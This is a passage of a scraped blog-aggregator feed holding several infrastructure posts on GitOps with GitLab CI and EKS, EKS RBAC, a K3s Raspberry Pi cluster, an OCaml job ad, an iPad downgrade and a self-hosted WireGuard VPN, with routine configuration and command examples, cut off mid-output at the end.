Kubernetes","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fgitops-kubernetes\u002F","In this post, I’d like to share my experience and learnings about configuring a deployment pipeline for Kubernetes. I’ll be using Gitlab CI\u002FCD and AWS EKS to demonstrate the concept, but the core idea remains the same: all changes must come declaratively from a single source of truth. GitOps is a relatively newer term in the town but goes back to the fundamentals of Infra as Code.\nGitOps fundamentally is an operating model to perform tasks on Kubernetes related to deployments, configuration, secrets and monitoring workloads. All kind of changes must be performed via a single place, which happens to be a git repo. Benefits of that are what basically benefits of version controlling the code is. So why treat infra as any different? git happens to be the single source of truth for your infra, rollbacks are easy as reverting to last known good configuration and every change can be observed\u002Fverified.\nGoals#\nA lot of tutorials\u002Fblog posts hitherto cover a very basic scenario where they do kubectl apply and voila the deployment’s live. However we all know things are very different (to say the least) in production, so this post will cover all aspects of deployment:\nCreating Manifests\nEnvironment Promotion\nHandling config and secrets\nAuthorization of CI\u002FCD in the cluster\nBasics#\nA GitOps workflow looks like:\nPush vs Pull#\nThere are 2 approaches to how you can handle deployments to a cluster. In a Pull based approach, the cluster runs a synch controller program which continmioously syncs the state of cluster with a Git repo. Any changes you make to the Git repo will be synced automatically in cluster. The idea is that there should be no drift in the desired state via Git repo and the actual state of cluster. Flux, Argo are good tools if you want a Pull based pipeline. The merits of Pull based pipeline is it’s more secure, since the deployment is actually happening inside cluster and no external sytstem needs to communicate to your production infra. The demerits are sometimes you’ve to wait for the changes to be synced (every controller runs these sync process in a loop with a sleep which can be configured). Also using any kind of preprocessing tools like Kustomize becomes difficult, since Flux just syncs the state and applies those changes. Handling of secrets is yet another concern, you need to look . And finally GitOps is a relatively newer tech in market so GitOps tooling is still nascent and like with any other relatively (non battle tested) software you’re gonna find bugs.\nPush Approach however is a traditional CD approach, where the CD server talks to the cluster and applies changes through commands. In context of normal EC2 deployments, those commands could be SSH into server, running ansible playbook etc. In context of K8s however kubectl does the magic for us. The CD server needs to talk to the K8s API server and run kubectl commands to change the cluster state.\nThe merits of this approach are you can run all sorts of commands inside deployment pipeline and make it fully customisable. Handling of secrets also can be handled natively (like Gitlab env variables) or encrypted in git.\nThe demerits is that your production cluster is now exposed to your CD server.\nOverall, if you have an airgapped CD server with no inbound ports open, access controll the user auth to CD, I found the Push approach to be more preferable. YMMV.\nWriting the pipeline#\nI’ve created a docker image eks-gitops which I’ll be using throughout the pipeline. This container image contains popular tools like kustomize, kubeval etc and scripts to configure access to cluster using kubectl using aws-iam-authenticator. I’ve written more about how RBAC works inside EKS here.\nExcerpt from .gitla-ci.yml:\n# Use this as base image for all jobs unless overriden\ndefault:\n  image:\n    name: mrkaran\u002Feks-gitops:latest\n    entrypoint: [\"\u002Fbin\u002Fsh\", \"-c\"]\n### Pipeline\nstages:\n  - validate\n  - deploy\nPrepare the manifests#\nI use Kustomize to prepare the manifests. Advantage of Kustomize is writing template free YAMLs but still be able to customise them heavily using overlays. For different environments, you can apply certain changes like increasing resource requests, adding more storage, while keeping the base same.\nHere’s a folder structure (from a real GitOps repo) I follow for manifests:\n.\n├── base\n│   ├── deployments\n│   │   ├── app.yml\n│   │   ├── celery.yml\n│   │   └── nginx.yml\n│   ├── ingresses\n│   │   └── web.yml\n│   ├── kustomization.yaml\n│   ├── services\n│   │   ├── app.yml\n│   │   ├── nginx.yml\n│   │   └── redis-headless.yml\n│   ├── statefulsets\n│   │   └── redis.yml\n│   └── volumes\n│       └── redis.yml\n├── kubekutter.yml\n├── Makefile\n├── overlays\n│   ├── dev\n│   └── prod\n│       ├── configs\n│       │   ├── app-config.env\n│       │   └── app-nginx.conf\n│       ├── kustomization.env.yml\n│       ├── namespace.yml\n│       ├── patches\n│       │   ├── configure-configmap-volume.yml\n│       │   ├── modify-alb.yml\n│       │   └── resource-limits.yml\n│       └── rbac.yml\n└── README.md\nShameless Plug: I created kubekutr which makes managing of these manifests using kustomize a breeze.\nSome things to note here:\nInside base\u002F, I keep all the base resources required for the app to run. The resources can be Service, Deployment, Ingress etc.\nInside overlays there are multiple folders for different environment. This is very crucial as we want to separate the production config with a UAT config. Last-mile configuration to the base becomes very easy with this folder structure, since you only now need to build the manifests by targetting a specific folder in CI.\nInside overlays\u002F{env}\u002Fpatches are all the “patches” you want to do to the base resource. Think like replica count, ALB subnets (since different env can be in different VPCs), increasing resource limits and stuff like that.\nrbac.yml abd namespace.yml is the only missing piece because it’s like a chicken and egg problem. I cannot deploy directly (at first go) from a CI\u002FCD if I don’t have a namespace created since the CD server is configured only has limited namespaced restricted access. So unless I create a namespace, add proper RBAC for the CD server I cannot do any deployments from CD. Note however this is only a first time step, which I guess is okay.\nLint yo manifest#\nI’m using kubeval to lint the manifests. The manifests have to prepared by kustomize. CI_ENVIRONMENT_NAME is set by Gitlab when you specify an environment for a job. Don’t sweat about this part, I’ll describe it more as we proceed.\n# Validate the yaml using kubeval\n.lint:\n  extends: .prepare-manifest\n  stage: validate\n  script:\n    - echo \"Linting manifest for ${CI_ENVIRONMENT_NAME}\"\n    - kustomize build overlays\u002F$CI_ENVIRONMENT_NAME --load_restrictor none | kubeval\nSetup environment#\nYou can define environment name as:\n# Create an environment to record all jobs for this env\n.prod: &prod\n  environment:\n    name: prod\n    url: https:\u002F\u002Fprod.site\n.dev: &dev\n  environment:\n    name: dev\n    url: https:\u002F\u002Fdev.site\nAny job which is to be executed in a particular environment can include this variable and CI_ENVIRONMENT_NAME will be automatically set.\nA cool feature of Gitlab is that you can restrict Variables scoped to the environment they are defined in.\nConfigure Secrets#\nAll secrets are defined as Environment Variables in Gitlab CD pipeline. While running the job, the runner has access to these variables and with the help of secretGenerator in kustomize, the Secret is created.\nI use secretGenerator because any time a K8s secret changes, kustomize appends with a new suffix, which makes the Replication Controller believe that they deployment has changed. So a new deployment is automatically triggered.\nAuthenticate to cluster#\nEKS uses aws-iam-authenticator and uses IAM access roles to allow the cluster to perform actions. Since this is a push based pipeline, you need to allow the access from your CD server to port 443.\nDeploy changes#\nThis is as simple as kubectl apply which configures all the changes and diff between cluster and real world state.\nHere’s a full gitops repo if you’re interested in checking it out:",[],{"slug":2325,"title":2326,"link":2327,"pubDate":2328,"contentSnippet":2329,"tags":2330,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"intro-rbac-kubernetes","Intro to RBAC in EKS","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fintro-rbac-kubernetes\u002F","2019-11-01T12:40:55.000Z","EKS uses a custom authenticator tool called “aws-iam-authenticator”. The basic idea is to make the auth flow in EKS easier by using the tools you already use in AWS.\n\nTo wrap your head around the flow, consider three separate entities:\nA kubernetes resource (entire namespace, specific pods\u002Fconfigs etc)\nAn action (get, watch, list, create, delete etc)\nAn IAM role\u002Fuser created on AWS\nYour usecase might be to give an IAM role access to a Kubernetes namespace for example with certain restricted actions.\nSince K8s is basically client-server communication with the API server, we must need to perform the following two things for every single API request which goes to the control plane:\nAuthentication\nkubectl talks to the API server using the token generated by aws-iam-authenticator. The API server passes on this info to the AWS servers which validated if the originating call is coming from a valid IAM user or not. If not, the access is denied from K8s.\nAuthorization\nOnce the IAM user is validated, the IAM user needs to be mapped to a user to perform Authorization so K8s API server can know whether the action\u002Fresource requested for is to be allowed or not. This is where the aws-auth-cm.yml comes into the picture. It is basically a map of all IAM users with internal K8s groups or users created. The roles are assosciated to these users\u002Fgroups so once the mapping is done, K8s API server can know what to do with the API request.\nHow does EKS know my IAM?#\nIf you configured your KUBECONFIG correctly using aws eks update-kubeconfig then you’ll find the below lines in your config file. This basically runs a aws cli command to find your IAM user\u002Frole configured on your system to produce a token.\n   exec:\n      apiVersion: client.authentication.k8s.io\u002Fv1alpha1\n      args:\n      - token\n      - -i\n      - eks-zero-public\n      command: aws-iam-authenticator\nShow me the YAML already#\nTo create a Role and RoleBinding\napiVersion: rbac.authorization.k8s.io\u002Fv1\nkind: Role\nmetadata:\n  namespace: coolapp\n  name: fullaccess\nrules:\n- apiGroups: [\"\"]\n  resources: [\"*\"]\n  verbs: [\"*\"]\n- apiGroups: [\"apps\"]\n  resources: [\"*\"]\n  verbs: [\"*\"]\n- apiGroups: [\"batch\"]\n  resources: [\"*\"]\n  verbs: [\"*\"]\n- apiGroups: [\"extensions\"]\n  resources: [\"*\"]\n  verbs: [\"*\"]\n- apiGroups: [\"autoscaling\"]\n  resources: [\"*\"]\n  verbs: [\"*\"]\n---\nkind: RoleBinding\napiVersion: rbac.authorization.k8s.io\u002Fv1\nmetadata:\n  name: 10xdevs-fullaccess\n  namespace: coolapp\nsubjects:\n- kind: Group\n  name: 10xdevs\n  namespace: coolapp\nroleRef:\n  kind: Role\n  name: fullaccess\n  apiGroup: rbac.authorization.k8s.io\nSo, for all the normal folks who don’t grok YAML as fast as 10x devops engineers, I am basically creating a Role fullaccess with all permissions for a namespace coolapp (innovative, ikr). Then I am binding this Role to a Group called 10xdevs so that the group is allocated the role which has permissions. We will use this group 10xdevs to map our AWS user now.\nTo create the map of IAM Role\u002FUser ARN with the above Role\nEdit your aws-auth-cm.yml and add the below stuff:\napiVersion: v1\nkind: ConfigMap\nmetadata:\n  name: aws-auth\n  namespace: kube-system\ndata:\n  mapRoles ... \u003Cskipping> ...\n\n  mapUsers: |\n    - userarn: arn:aws:iam::\u003Caccount-id>:user\u002F\u003Cuser-name>\n      username: 10xdevs-fullaccess # RoleBinding name created in previous step\n      groups:\n        - 10xdevs # Group name created in previous step\nVerify it yourself#\nkubectl auth can-i create pods --all-namespaces: should fail\nkubectl auth can-i create pods -n coolapp: should work\nFin!",[],{"slug":2332,"title":2333,"link":2334,"pubDate":2335,"contentSnippet":2336,"tags":2337,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"home-server-setup","Kubernetes cluster on RPi","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fhome-server-setup\u002F","2019-09-22T02:40:55.000Z","So, I got hold of 2 Raspberry Pi4 (still limited stocks in India) recently and wanted to build a Kubernetes cluster. Don’t ask why cause that would be pointless. I’ve little experience with a managed Kubernetes workload (Amazon EKS, which btw deserves its post 😝) but never really played around any of the K8s internal stuff yet. In this post, I’ll show you how I got a lightweight Kubernetes distro: K3s up and running.\nk3s is a pretty great Kubernetes distro which passes the K8s Conformance tests. On ARM architectures, you’re pretty much resource-bounded and you want the resource footprint of your infra to be as minimal as possible. In k3s there are a few changes such as the persistent layer of K8s is replaced with SQLite instead of etcd, unusable (legacy\u002Falpha) features of K8s are removed and cloud-provider plugins are not bundled (but can be installed separately). All of this together means just 40MB of a binary to run the cluster and ~250MB of memory usage on an idle cluster. Awesome, team Rancher :)\n\nAutomation is the key and even though I have just 2 nodes on RPi, I Ansible-ized the setup which I am hoping would save time in future if I add more nodes to the setup.\nHardware#\n1x RPi4 4GB and 1x RPi4 2GB variant\n2x Samsung EVO micro SD Card\n2x USBC Cables\n1x Amker Power Port (don’t compromise on the power supply, give enough juice so RPi doesn’t throttle)\n1x TP-Link Network Switch (my router has only 1 usable LAN port)\n2x CAT5 LAN cables (keeping it basic, you can get fancy flat LAN cables if you wish to)\nThis is how the final setup looks like:\n{{\u003C tweet 1175659256764219392 >}}\nSetting up RPi#\nI downloaded Raspbian Buster Lite because it’s the easiest to setup. Next step is to flash the SD card and for that, I used Etcher.\n\nTo enable SSH access, you need to create an empty file ssh in the root volume.\nsudo touch \u002Fboot\u002Fssh\nOnce all sorted, we can use Ansible to set up the basic OS stuff, like changing the default password, enabling password-less SSH login, timezone & locale settings, changing hostname etc. I’ll be sharing relevant Ansible snippets, if interested you can check out the complete playbook at mr-karan\u002Fhydra repo.\nWe need to enable container features on the RPi so that containerd can run. Containers like Docker make use of cgroups (Linux kernel feature) which allows them to put resource limits on container processes like CPU and Memory. To enable cgroups, you need to edit \u002Fboot\u002Fcmdline.txt.\n- name: Add cgroup directives to boot command line config\n  lineinfile:\n    path: \u002Fboot\u002Fcmdline.txt\n    regexp: '((.)+?)(\\scgroup_\\w+=\\w+)*$'\n    line: '\\1 cgroup_enable=cpuset cgroup_memory=1 cgroup_enable=memory'\n    backrefs: yes\nQuick Tip: If you’re going to use RPi as a headless server (not connecting with any monitor) you can reduce the GPU Memory to lowest possible (16M)\n- name: Set GPU memory split to 16 MB\n  lineinfile:\n    path: \u002Fboot\u002Fconfig.txt\n    line: \"gpu_mem=16\"\n    create: yes\nDeploy K3s cluster#\nNext, we’ll come to the actual stuff, where we’ll download K3s binary and run as a systemd service. There’s a handy shell script to bootstrap the cluster provided by the Rancher team which setups the whole thing in one command. But if you wanna learn\u002Fplay around I’d recommend you do things the hard way (it’s not all that hard tho. ((twss!)).\n- name: Download k3s binary armhf\n  get_url:\n    url: https:\u002F\u002Fgithub.com\u002Francher\u002Fk3s\u002Freleases\u002Fdownload\u002F{{ k3s_version }}\u002Fk3s-armhf\n    dest: \u002Fusr\u002Flocal\u002Fbin\u002Fk3s\n    owner: root\n    group: root\n    mode: 755\n  when: ( ansible_facts.architecture is search(\"arm\") )\n    and\n    ( ansible_facts.userspace_bits == \"32\" )\nOn the worker node, the process is similar, except you have to run the K3s with agent compared to server argument in the control plane. Things get a bit interesting here though. You need to give the cluster server URL along with it’s token in the command. A unique token is generated by the server at (\u002Fvar\u002Flib\u002Francher\u002Fk3s\u002Fserver\u002Fnode-token) which is used to join the worker nodes.\nI did a bit of google-fu and got to know about this neat little Ansible module set_fact which lets you “store” a variable from one host and use it in a second host. Every Ansible host maintains a Python dict of “host facts”. In the second node, I access the cluster’s host fact dict, fetch the variable and use it in its systemd service template. Neat, ain’t it? Ansible has so many modules, it is mind-boggling.\nReading and storing the variable as a “host” fact:\n# on the cluster\n- name: Read node-token from control node\n  slurp:\n    src: \u002Fvar\u002Flib\u002Francher\u002Fk3s\u002Fserver\u002Fnode-token\n  register: node_token\n\n- name: Store control node-token\n  set_fact:\n    k3s_cluster_token: \"{{ node_token.content | b64decode | regex_replace('\\n', '') }}\"\nUsing the variable from the server host, in a template on the agent host:\n# on the agent (vars.yml)\nk3s_server_address: \"{{ hostvars[groups['control'][0]].k3s_server_address }}\"\nk3s_cluster_token: \"{{ hostvars[groups['control'][0]].k3s_cluster_token }}\"\n# use the value in a template\n...\n[Service]\nExecStart=\u002Fusr\u002Flocal\u002Fbin\u002Fk3s agent --server {{ k3s_server_address }} --token {{ k3s_cluster_token }}\n...\nP.S. Shoutout to Ansible tho. It is one of my fav infra tooling available out there. It has some gotchas that you need to be aware of but by and large, the experience has been quite pleasant.\nOn the cluster, you should be able to see the nodes.\n\n\nTeam #SelfHost#\nI am planning to host Bitwarden, Gitea and a Nextcloud instance on this cluster. Also will be using this as a testbed to play around with K8s internals. Stay tuned as I explore more of this!\nCheers! :)",[],{"slug":2339,"title":2340,"link":2341,"pubDate":2342,"contentSnippet":2343,"tags":2344,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"1115-multicore-job","Multicore OCaml Jobs","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmulticore\u002Fjob\u002F2019\u002F09\u002F16\u002F1115-multicore-job\u002F","2019-09-16T11:59:00.000Z","Multiple Research Software Engineer positions are available in the\nDepartment of Computer Science and Engineering at\nthe Indian Institute of Technology, Madras to develop\nMulticore OCaml and enable\nTezos ecosystem to benefit from Multicore OCaml.\n A dog, a deer and a monkey walk into a coffee shop... \n\n\n\nBackground\nThe Multicore OCaml project aims to add native support for scalable concurrency\nand shared memory parallelism in OCaml. At its core, Multicore OCaml extends the\nOCaml programming language with effect handlers for expressing scalable\nconcurrency and a high-performance concurrent garbage collector aimed at\nresponsive networked applications. Multicore OCaml is also the first\nindustrial-strength language to come equipped with an efficient yet modular\nmemory model, allowing high-level local program reasoning while retaining\nperformance. Multicore OCaml is actively being developed and core features are\nbeing upstreamed to OCaml.\nTezos is an open-source smart contract platform for decentralized applications\nand assets. Tezos uses a self-amending cryptographic ledger - It achieves\nconsensus not just about the state of a ledger, but about the state of its own\nprotocol. The primary protocol of Tezos utilizes proof of stake and supports\nTuring complete smart contracts in a domain-specific language called Michelson.\nTezos codebase is written in OCaml and extensively uses OCaml ecosystem\nlibraries and tools such as Lwt, OPAM, and Irmin.\nRoles\nThere are two roles:\nCompiler Engineer: Runtime system improvements to the OCaml programming\nlanguage in order to make it compatible with multicore support. Implementing\nnew features in Multicore OCaml compiler.\nApplication Engineer: Developing core OCaml libraries that take advantage\nof multicore support. Adding parallelism support for Tezos ecosystem libraries\nand tools such as Lwt, Irmin, and dune.\nPositions\nThe positions available are:\nRole\n      Minimum Qualification\n      Pay Range (Per Month)\n    \nProject Engineer\n      BE \u002F BTech \u002F Master’s in Science\u002FMCA or equivalent\n      Rs.21,500 to Rs.75,000\n    \nSenior Project Engineer\n      ME \u002F MTech (or) BE \u002F BTech \u002F Master’s in Science \u002F MCA or equivalent with 2 years experience\n      Rs.27,500 to Rs.1,00,000\n    \nSenior Project Officer \u002F Post-doctoral Researcher\n      Ph.D. in Engineering or Sciences (or) ME \u002F MTech with 3 years experience (or) BE \u002F BTech \u002F Master’s in Science \u002F MCA or equivalent with 5 years experience\n      Rs.35,000 to Rs.1,50,000\n    \nPrincipal Project Officer\n      Ph.D. in Engineering or Sciences with 7 years experience (or) ME \u002F MTech with 10 years experience (or) BE \u002F BTech \u002F Master’s in Science \u002F MCA or equivalent with 12 years experience\n      Rs. 48,000 to Rs.2,25,000\n    \nThe appointment will be made for 6 months initially and can be extended up to 2\nyears. The project engineers have the option of enrolling in the MS program at\nCSE, IIT Madras after 6 months. Such candidates may appear to the interview\ndirectly, without having to write GATE.\nYou will work closely with the OCaml Labs group,\nUniversity of Cambridge, UK and Tarides, France. All of\nthe work done will be made available as liberally licensed open-source software.\nSkills\nCompiler Engineer\nNecessary:\nExcellent working knowledge of C, concurrent and parallel programming\nKnowledge of compilers (not necessarily of functional programming languages),\noperating systems, x86 & ARM assembly programming\nDesired:\nExperience developing and\u002For maintaining performant software systems\nExperience with a functional programming language such as Haskell, OCaml,\nScala, Scheme, Elm, or Elixir.\nTrack record of open source contributions.\nUnderstanding of benchmarking techniques and analyzing results\nApplications Engineer\nNecessary\nExcellent working knowledge of operating systems, concurrent and parallel\nprogramming\nExperience with a functional programming language such as Haskell, OCaml,\nScala, Scheme, Elm, or Elixir.\nDesired\nTrack record of contributions to large open-source software systems\nUnderstanding of benchmarking techniques and analyzing results\nApply\nWrite to kcsrk@iitm.ac.in with the subject “IITM Multicore OCaml 2019:\nCompiler Engineer” or “IITM Multicore OCaml 2019: Application Engineer” based on\nthe role to express interest. Please include:\nCurriculum Vitae\nA summary of your experience in relevant technologies and software\nAny open source contributions",[],{"slug":2346,"title":2347,"link":2348,"pubDate":2349,"contentSnippet":2350,"tags":2351,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"ipad-downgrade-ios-6-8","Downgrading my iPad 2 to iOS 8","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F08\u002F11\u002Fipad-downgrade-ios-6-8\u002F","2019-08-11T00:00:00.000Z","Update: Apple is no longer signing iOS6 for the iPad 2, so this is no longer feasible.\nI own a iPad 2 (GSM), which is rarely used these days because it is too slow with the latest iOS 9 upgrades. It is a 8 year old device, but I can’t just install Linux on it and make it usable, which is what I do with most other devices.\nThe next best thing was to downgrade the iOS version. The device is anyway un-supported at this point, so I might as well go there. Apple has restrictions on which iOS releases are installable at any point on any device, ~but thankfully they are still signing iOS6 for my device for some legal reasons~.\nSteps:\nDownload the iOS firmware for your device from https:\u002F\u002Fipsw.me\u002F#platform\nLaunch iTunes\nOption+Click on the Restore button in iTunes\nSelect the file you just downloaded.\nDisable iCloud on the device\nUpgrade to iOS8\nThis is possible as long as Apple is signing the IPSW for your device. The case of iOS6 being signed seems to be true for:\niPhone 4S\niPad 2\nSecurity Notes\nRunning an unsupported OS is not something I take lightly. Here’s a list of defensive measures I took to ensure that I’m not at risk while doing so:\nTry to keep the device always in Airplane mode.\nKeep sensitive data off the device. No photos\u002Fkeychain sync for eg. Don’t enable Calendar\u002FContact\u002FMedia sync.\nEnable Restrictions on the device:\n    \nRestrict Safari to limited websites.\nDisable application installs.\nDisable iTunes store\u002FiBooks store etc.\nDisable GPS\u002FBluetooth.\nLimit Background Refresh to very few trusted applications.\nLimit number of applications (I only have Kybooks installed).\nDisable Javascript on Safari.\nIf possible, I’d recommend using a separate Apple Account on the device.",[],{"slug":2353,"title":2354,"link":2355,"pubDate":2356,"contentSnippet":2357,"tags":2358,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"personal-networking-setup","My Personal Networking Setup","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fpersonal-networking-setup\u002F","2019-06-29T12:40:55.000Z","If I have nothing to hide then I have nothing to show either\nWhen you visit a site from your browser, there are several entities which have access to this information in one request-response cycle. Starting from the router you connect to, to the DNS resolver you use to resolve the IP Address of the site, and finally, the ISP which has access to the raw network packets (unencrypted or encrypted). They are all insecure by default and most users on the internet do not care about their privacy. ISPs can very easily profile you by the queries you do and sell that data to 3rd party Ad companies. There are still a huge number of sites on the world wide web which don’t have a basic SSL encryption turned on. Even with the HTTPS turned on your ISPs can simply see the unencrypted DNS queries and figure out the site you’re visiting. Browser fingerprinting is another well-known technique where you can be easily profiled based on the different parameters exposed by your browser and generate patterns in your browsing habits.\nIf you’re a human you already care about your privacy. You won’t give out your Whatsapp chats to a random stranger on the streets to read, you won’t leave the door open while bathing, you won’t leave your credit card details out in the open, you will have a closed private discussion with your second half. Everyone does care about privacy in real life and everyone should care about the same online too.\n“Some” social media companies exist solely on the data you provide. They are in the business of selling data and they don’t care a bit about your privacy. Every ad company out there wants an online persona about you, to feed you “personalized” recommendations. You may argue that they are “useful” but you cannot deny the fact that they are invading your privacy. You won’t like unwanted relationship advice from your neighbour when he hears you both fighting in the middle of the night. No one likes invaders, period.\nCorrelation of data points is easy to do in this age of ML\u002FAI (Malai). Re-iterating an example I read somewhere on the interwebz, say you search for a very generic term “cancer”, this alone doesn’t indicate that you have cancer but merely is suggestive of the fact that you are interested in knowing more about the disease. Now maybe a few days later you search for the phrase “buy a wig online”. These 2 search queries put together can suggest that you’ve had chemotherapy done recently. This is a piece of information you might not want to hide, but you do want to have an option right?\nThat’s the whole fight against companies which invade your privacy is. You have absolutely no choice. You’re devoid of any choice.\nGoogle is your friend\nYou may not even realise but we’ve all been guilty of Googling some random shit for fun, googling about anxiety or depression when feeling low, how to lose weight and all such seemingly embarrassing questions and we simply confront these things to Google thinking that no one is spying on us or being judgemental of us and we’re in a safe zone. What if this “friend” is the one who’s stabbing your back. No surprises there! You don’t even know but these search engines might have already shared all such queries with several 3rd party providers and business who are on the lookout for such data.\nI am scared\nI hope by now you’re convinced that you want some basic privacy online. If not, stop reading here because if this didn’t persuade you enough, nothing will and the rest of the blog is pretty useless for you anyway, so thanks for stopping by!\nFor the rest of us folks, there are a few practical things we can immediately start which. These are the things which have very less involvement of effort but are a good kickstart.\nUse DNS over HTTPS (DoH) based resolver (personal choice: 1.1.1.1)\nUse a browser which doesn’t ship with its own god damn resolver (personal choice: Firefox)\nUse an Ad-Blocker (personal choice: uBlock Origin)\nOnly with the above 3 steps you’ve achieved:\nISPs cannot see your DNS queries in plain text\nWebsites cannot serve you random js code in the name of ads\nA web browser which is more focussed towards privacy in general\nIf you’re someone who wants to spend a bit more time (trust me it won’t take even one hour) and a bit of money (one movie ticket a month) you should host your personal VPN. VPNs are awesome because you mitigate a lot of privacy invaders and you are on an anonymous browsing mode generally. Theoretically, we have shifted the trust from the ISP to the cloud provider where VPN is hosted, yes. But as long as you’re not doing anything illegal in the eyes of the state, you should be fine.\nProtip: Don’t use VPN to do something stupid. You are always trackable. The whole exercise is to not allow bad actors to access your personally identifiable information online and have a non-intrusive browsing experience. If you think by using VPNs you can get away with doing something which is illegal by your state then you’re wrong.\nTools I use#\nVPN: Wireguard\nAdblocking: Pi-hole\nDNS Resolver: Unbound\nThe setup is pretty straightforward. I use Wireguard client on my MBP and an Android device to connect to the Wireguard VPN server hosted on a $5 DO droplet in Bengaluru, India. For ad-blocking, I use Pi-hole, which does DNS based ad-blocking. And finally to resolve the DNS queries I use vanilla unbound without any forwarders.\nRead the following sections to know more on each of the above pieces.\nSetting up wireguard VPN#\nWireguard gets all the love from me (thanks to @sarat for telling me about this). It is probably the best option out there if you’re looking to self-host a VPN. Wireguard gets a lot of things right, first being the ease of setup. Literally takes a few commands and you’re all set. Wireguard is very lightweight and consumes minimal resources. Wireguard has better encryption and is a lot faster than IPvsec or open VPN. Cloudflare’s new app Warp is also based on Wireguard. Oh, and did I mention that Wireguard seamlessly transitions when you switch networks (which happens all the time when you’re on shitty 4G network\u002Fpublic WiFis).\nWireguard basically has 2 parts. One is the server and the other is the client.\nWireguard sits in its own separate network namespace and uses this namespace as an init namespace from where the traffic is received or sent. This namespace is now responsible for flowing your traffic to the other actual interface your network card on the device (which is probably wlan or eth).\nInstalling Wireguard#\n$ sudo add-apt-repository ppa:wireguard\u002Fwireguard\n$ sudo apt-get update\n$ sudo apt-get install wireguard-dkms wireguard-tools linux-headers-$(uname -r)\nGenerating Public\u002FPrivate key pair#\n$ umask 077\n$ wg genkey | tee server_private_key | wg pubkey > server_public_key\n$ ls\nserver_private_key  server_public_key\nConfiguring Wireguard (server)#\n$ touch \u002Fetc\u002Fwireguard\u002Fwg0.cong\n$ vim \u002Fetc\u002Fwireguard\u002Fwg0.conf\n# Add the following lines and modify the values\n[Interface] # Configuration settings for a separate network interface\nAddress = 10.200.200.1\u002F24 # You can choose any private subnet\nSaveConfig = false # Wireguard can configure additional peers automatically without reloading wireguard, for some reason this didn't work well for me\nPrivateKey = \u003Credacted> # Output of the `server_private_key` generated in the above setup\nListenPort = 51820 # Default port\n\n# Add the peers (clients which connect to the wireguard server)\n[Peer]\n# MBP\nPublicKey = \u003Claptop_public_key>\nAllowedIPs = 10.200.200.2\u002F32\n[Peer]\n# Android\nPublicKey = \u003Cphone_public_key>\nAllowedIPs = 10.200.200.3\u002F32\nConfiguring Wireguard (client)#\nRepeat the step of generating a Public\u002FPrivate key pair. You can also take a look at Subspace which is a nice GUI tool which helps you create additional profiles for your devices where generating key\u002Fpair is not convenient like mobile phones. I didn’t get the time to set it up personally, so I generated public\u002Fprivate keys from my laptop itself and then configured it manually using an Android app Viscerion which is a wireguard client app.\nFor the client, your config file should look like:\n[Interface]\nPrivateKey = \u003Cclient_private_key>\nAddress = 10.200.200.2\u002F32\n\n[Peer]\nPublicKey = \u003Cserver_public_key>\nAllowedIPs = 0.0.0.0\u002F0\nEndpoint = \u003Cpublic_ip_droplet>:51820\nPersistentKeepalive = 25\nRecap#\nIf you got overwhelmed at this point, let’s recap what just happened.\nWe have 2 config files, one for the server and one for the client which happens to be my laptop. On each of the devices, generate a public\u002Fprivate key pair.\nOn the server side, while configuring peer, give the public key of the client. On the client side, while configuring peer,give the public key of the server. This is similar to how ssh works. Wireguard uses Curve25519 crypto technique to generate a public\u002Fprivate key pair, which honestly looks so better than lengthy ECDSA\u002FRSA ones :P\nNow let us start the wireguard service. wireguard provides a nice wrapper wg-quick which does the following things when you start:\nsudo wg-quick up wg0\n[#] ip link add wg0 type wireguard\n[#] wg setconf wg0 \u002Fdev\u002Ffd\u002F63\n[#] ip -4 address add 10.200.200.1\u002F24 dev wg0\n[#] ip link set mtu 1420 up dev wg0\nYou can verify a new network interface now by:\n$ ip addr | grep wg0\n5: wg0: \u003CPOINTOPOINT,NOARP,UP,LOWER_UP> mtu 1420 qdisc noqueue state UNKNOWN group default qlen 1000\n    inet 10.200.200.1\u002F24 scope global wg0\nYou can also view the wireguard connection status by:\n$ sudo wg show\ninterface: wg0\n  public key: \u003CREDACTED>\n  private key: (hidden)\n  listening port: 51820\n\npeer: \u003CREDACTED>\n  allowed ips: 10.200.200.2\u002F32\nAlmost There, But Not Quite#\nTurn on your wireguard client and you will notice a strange thing. At this point, you’re not able to browse the internet but you are able to connect to the wireguard server and even wireguard is acknowledging that (notice the last two lines in the following snippet):\n$ sudo wg show\ninterface: wg0\n  public key: \u003CREDACTED>\n  private key: (hidden)\n  listening port: 51820\n\npeer: \u003Cclient_public_key>\n  endpoint: \u003Cclient_public_ip>:64882\n  allowed ips: 10.200.200.2\u002F32\n  *latest handshake: 8 seconds ago*\n  *transfer: 754.60 KiB received, 5.59 MiB sent*\nWireguard status shows that our client can reach the wireguard server. But still, we’re unable to browse the internet on our client.\nTo debug this further, let’s use tcpdump and monitor the packets coming in wg0 interface. Since tcpdump’s output can be overwhelming and contains a lot of noise, let’s filter to monitor only the ICMP packets. So we’ll be using ping from a client which is the easiest way to send ICMP packets from point A to point B.\n# on wireguard client\n➜  ~ ping $(curl icanhazip.com)\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100    14  100    14    0     0     16      0 --:--:-- --:--:-- --:--:--    16\nPING \u003Cserver_ip_redacted> (\u003Cserver_ip_redacted>): 56 data bytes\n64 bytes from \u003Cserver_ip_redacted>: icmp_seq=0 ttl=64 time=112.126 ms\n64 bytes from \u003Cserver_ip_redacted>: icmp_seq=1 ttl=64 time=142.980 ms\n^C\n--- \u003Cserver_ip_redacted> ping statistics ---\n2 packets transmitted, 2 packets received, 0.0% packet loss\n# on wireguard server\n$ sudo tcpdump -nni wg0 -Q in icmp\ntcpdump: verbose output suppressed, use -v or -vv for full protocol decode\nlistening on wg0, link-type RAW (Raw IP), capture size 262144 bytes\n14:26:31.991498 IP 10.200.200.2 > \u003Cserver_ip_redacted>: ICMP echo request, id 52630, seq 0, length 64\n14:26:33.027288 IP 10.200.200.2 > \u003Cserver_ip_redacted>: 